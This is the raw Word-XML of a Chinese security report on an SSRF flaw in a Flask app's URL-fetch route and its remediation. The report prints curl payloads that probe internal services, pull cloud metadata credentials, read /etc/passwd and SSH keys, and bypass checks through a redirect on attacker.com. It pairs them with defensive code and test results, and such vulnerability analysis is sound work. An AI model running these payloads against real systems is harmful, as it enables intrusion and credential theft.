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/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>SSRF漏洞修复安全分析报告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报告日期：2026年7月13日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项目名称：Flask 用户信息管理平台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项目地址：https://github.com/Y-a777/-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Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>一、概述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服务端请求伪造（Server-Side Request Forgery, SSRF）是一种严重的 Web 安全漏洞。攻击者通过提交恶意构造的 URL，诱使服务器端发起请求到内网或其他受限网络，从而实现内网探测、敏感文件读取、云元数据窃取等攻击行为。本报告详细分析项目中 URL 抓取功能存在的 SSRF 漏洞、攻击场景及修复方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>二、漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 漏洞描述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修复前，/fetch-url 路由直接将用户提交的 URL 传递给 urllib.request.urlopen()，未做任何限制。攻击者可以构造各种恶意 URL 实现 SSRF 攻击。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漏洞代码（修复前）：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target_url = request.form.get("url", "").strip()</w:t>
        <w:br/>
        <w:t>req = urllib.request.Request(target_url)</w:t>
        <w:br/>
        <w:t>with urllib.request.urlopen(req, timeout=10) as response:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    content = response.read().decode("utf-8", errors="replace")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    result["content"] = content[:5000]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 漏洞分类与危害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漏洞名称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风险等级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攻击目标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SSRF-01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内网服务探测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严重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扫描内网拓扑、开放端口、运行服务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SSRF-02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云元数据泄露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严重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获取云平台临时凭据，横向移动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SSRF-03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file:// 协议文件读取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高危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泄露源码、密码、配置、SSH密钥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SSRF-04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URL 跳转绕过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高危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绕过协议限制，扩大攻击面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SSRF-05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端口扫描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中危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判断内网端口是否开放</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 攻击场景示例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场景一：内网服务探测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# 探测本机 Flask 服务</w:t>
        <w:br/>
        <w:t>curl -X POST http://target/fetch-url -d "url=http://127.0.0.1:5000/"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 探测内网 Redis</w:t>
        <w:br/>
        <w:t>curl -X POST http://target/fetch-url -d "url=http://10.0.0.1:6379/"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 探测内网 MySQL</w:t>
        <w:br/>
        <w:t>curl -X POST http://target/fetch-url -d "url=http://10.0.0.1:3306/"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场景二：云元数据泄露（最危险）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# AWS 获取 IAM 临时凭据</w:t>
        <w:br/>
        <w:t>curl -X POST http://target/fetch-url \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 阿里云元数据</w:t>
        <w:br/>
        <w:t>curl -X POST http://target/fetch-url \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=http://100.100.100.200/latest/meta-data/"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场景三：file:// 协议读取本地文件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curl -X POST http://target/fetch-url -d "url=file:///etc/passwd"</w:t>
        <w:br/>
        <w:t>curl -X POST http://target/fetch-url -d "url=file:///root/.ssh/id_rsa"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场景四：302 跳转绕过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攻击者搭建外部服务器，发送 302 重定向到内网地址：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# 攻击者服务器返回 302 Location: http://169.254.169.254/latest/meta-data/</w:t>
        <w:br/>
        <w:t>curl -X POST http://target/fetch-url \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "url=http://attacker.com/redirect?target=http://169.254.169.254/"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>三、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 协议白名单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仅允许 http 和 https 协议，禁止 file://、gopher://、dict:// 等其他协议：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parsed = urlparse(url)</w:t>
        <w:br/>
        <w:t>if parsed.scheme not in ("http", "https"):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return f"不支持的协议：{parsed.scheme}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 IP 地址黑名单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解析域名后检查目标 IP，拦截以下类型的地址：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IP 范围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类型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127.0.0.0/8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回环地址（localhost）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10.0.0.0/8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私有地址 A 段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172.16.0.0/12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私有地址 B 段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192.168.0.0/16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私有地址 C 段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169.254.0.0/16, 100.100.100.200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云元数据地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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核心代码：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def is_private_ip(ip_str):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip = ipaddress.ip_address(ip_str)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ip.is_private: return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ip.is_loopback: return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ip.is_link_local: return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ip.is_multicast: return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if ip.is_reserved: return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if str(ip) == "100.100.100.200": return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return False</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 DNS 解析 + 域名检查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将域名解析为 IP 后再检查，防止域名绕过（如 localhost → 127.0.0.1）：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try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ipaddress.ip_address(hostname)  # 已经是 IP</w:t>
        <w:br/>
        <w:t>except ValueError:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip_str = socket.gethostbyname(hostname)  # 域名解析</w:t>
        <w:br/>
        <w:br/>
        <w:t>if is_private_ip(ip_str):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return f"禁止访问内网地址：{ip_str}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 302 跳转最终地址检查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检查重定向后的最终 URL，防止攻击者通过外部跳板机绕过 IP 黑名单：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with urllib.request.urlopen(req, timeout=10) as response:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    final_url = response.geturl()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    redirect_error = resolve_and_check(final_url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if redirect_error:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "跳转目标被拦截"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>四、修复前后对比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测试用例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修复前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正常 HTTP 外网（httpbin.org）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正常访问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正常访问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file:///etc/passwd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C80000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>读取密码文件（高危）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拦截：不支持的协议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http://127.0.0.1:5000/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抓取本服务内容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拦截：禁止访问内网地址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http://localhost/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抓取本机服务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拦截：禁止访问内网地址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http://192.168.1.1/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探测内网设备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拦截：禁止访问内网地址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http://10.0.0.1:6379/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探测内网 Redis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拦截：禁止访问内网地址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http://169.254.169.254/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读取云元数据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拦截：禁止访问内网地址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http://100.100.100.200/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读取阿里云元数据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拦截：禁止访问内网地址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外部 302 → 内网地址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跳转到内网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拦截：跳转目标被拦截 ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>五、涉及文件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app.py — 新增 is_private_ip()、resolve_and_check() 函数，重写 /fetch-url 路由，增加协议校验、DNS 解析、IP 黑名单、302 跳转检查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static/css/style.css — 新增抓取结果渲染样式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templates/index.html — 新增 URL 抓取表单和结果显示区域</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>六、安全建议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严格限制 URL 协议为 http/https，禁用 file://、gopher://、dict:// 等协议。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对所有目标 IP 进行黑名单检查，禁止访问私有、回环、链路本地地址。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对域名进行 DNS 解析后再检查 IP，防止域名绕过。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检查 HTTP 重定向后的最终 URL，防止跳板绕过。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设置 URL 白名单机制，仅允许访问预设的可信域名列表。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限制每次抓取的内容大小，防止内存耗尽（已限制 100KB）。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记录所有抓取请求的日志，便于事后审计。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